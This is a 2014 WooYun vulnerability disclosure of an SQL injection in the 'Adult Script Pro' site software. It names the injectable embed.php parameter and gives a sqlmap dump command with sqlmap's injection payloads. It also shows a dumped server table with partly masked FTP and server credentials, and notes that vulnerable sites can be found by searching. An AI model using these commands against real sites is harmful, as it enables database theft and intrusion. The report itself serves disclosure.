当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-065982

漏洞标题:某国外成人网站系统通用型SQL注入漏洞

相关厂商:Adult Script

漏洞作者: M0nster

提交时间:2014-06-23 22:35

修复时间:2014-06-28 22:18

公开时间:2014-06-28 22:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-23: 细节已通知厂商并且等待厂商处理中
2014-06-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

通过测试此版本均有SQL注入漏洞 但网站程序需要购买所以不清楚版本号 通过读取数据库server表可以得到ftp地址和用户密码

详细说明:

起因是因为国内某绅士网站观看学习视频需要积分,于是找到了视频播放页面就可以绕过积分限制了,后来测试了一下1=2会报错,sqlmap跑下库妥妥儿的。后来用手机登录网站发现标题和电脑登录的标题不同,显示的是Mobile Adult Script Pro 这个一看就是通用程序嘛,谷歌一下到官网发现官网提供的demo里面可以重现漏洞。

http://www.adultscriptpro.com/demo.html


google一下标题会发现不少使用此套程序的,有的需要改一下路径,基本全都可以搞定。

漏洞证明:

http://www.xxx.com/modules/video/player/nuevo/embed.php?id=2806 and 1=1


QQ截图20140623215155.png


http://www.xxx.com/modules/video/player/nuevo/embed.php?id=2806 and 1=2


QQ截图20140623215214.png


python sqlmap.py -u http://www.xxx.xxx/modules/video/player/nuevo/embed.php?id=2806 --dump -T server -D xxx -v 0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2806 AND 6581=6581
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=2806 AND (SELECT 7265 FROM(SELECT COUNT(*),CONCAT(0x716e6a6471,(SELECT (CASE WHEN (7265=7265) THEN 1 ELSE 0 END)),0x716b767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=2806 AND SLEEP(5)
---
web application technology: PHP 5.4.26
back-end DBMS: MySQL 5.0
Database: ***
Table: server
[1 entry]
+-----------+--------------+---------+--------+----------+----------+----------------+---------------------+----------------+--------------------------------+----------------------+--------------+--------------+--------------+-----------------+------------------+------------------+----------------------+
| server_id | total_videos | url | status | ftp_port | ftp_root | ftp_host | last_used | server_name | rtmp_stream | lighttpd_url | ftp_username | lighttpd_key | ftp_password | lighttpd_prefix | streaming_server | streaming_method | lighttpd_secdownload |
+-----------+--------------+---------+--------+----------+----------+----------------+---------------------+----------------+--------------------------------+----------------------+--------------+--------------+--------------+-----------------+------------------+------------------+----------------------+
| 2 | 2974 | <blank> | 1 | 21 | / | 16手.21动.5打.21码 | 2014-06-24 09:35:14 | 16手.21动.5打.21码 | rtmp://16手.21动.5打.21码:1935/vod | http://www.xxx.com | *** | P4ss#w0rD | zx*****121 | /stream/ | apache | rtmp | 0 |
+-----------+--------------+---------+--------+----------+----------+----------------+---------------------+----------------+--------------------------------+----------------------+--------------+--------------+--------------+-----------------+------------------+------------------+----------------------+


修复方案:

版权声明:转载请注明来源 M0nster@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-06-28 22:18

厂商回复:

暂未能建立与软件生产厂商的联系渠道。

最新状态:

暂无